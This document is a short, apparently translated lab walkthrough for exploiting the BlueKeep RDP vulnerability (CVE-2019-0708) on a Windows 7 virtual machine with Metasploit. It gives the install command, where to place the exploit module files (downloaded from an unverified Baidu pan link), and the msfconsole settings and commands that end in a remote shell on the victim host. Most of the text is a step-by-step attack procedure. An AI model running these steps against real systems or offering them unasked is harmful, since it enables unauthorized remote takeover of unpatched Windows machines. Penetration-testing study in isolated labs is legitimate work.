Vulnerable Environment
Use VMware to install a Windows 7 SP1 virtual machine that simulates the victim machine.
Attack tool preparation
- 1. Use the following one-line command to update the installed Metasploit framework:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
- 2. Download the files from the reference link and place them in the corresponding folders of the MSF installation (if a file already exists, it can be overwritten directly):
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Attack commands
Use msfconsole to enter the Metasploit framework.
After entering, use reload_all to reload the modules so that the 0708 RDP module is picked up.
Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rce to enable the 0708 RDP attack module.
Use info to view the module's information and settings.
The key settings are mainly RHOSTS, RPORT and target.
Use set RHOSTS <victim machine IP> to set the victim machine's IP.
Use set RPORT <victim machine port> to set the victim machine's RDP port number.
Use set target <ID number (optional, 0-4)> to set the victim machine's architecture.
Here we are using VMware, so target 2 satisfies the condition.
Use exploit to begin the attack and wait for the connection to be established. Once the connection is established, use the obtained shell, then obtain an interactive shell to complete the attack; permissions on the victim host have been successfully obtained.
Reference
Link: https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg extraction code: ml9g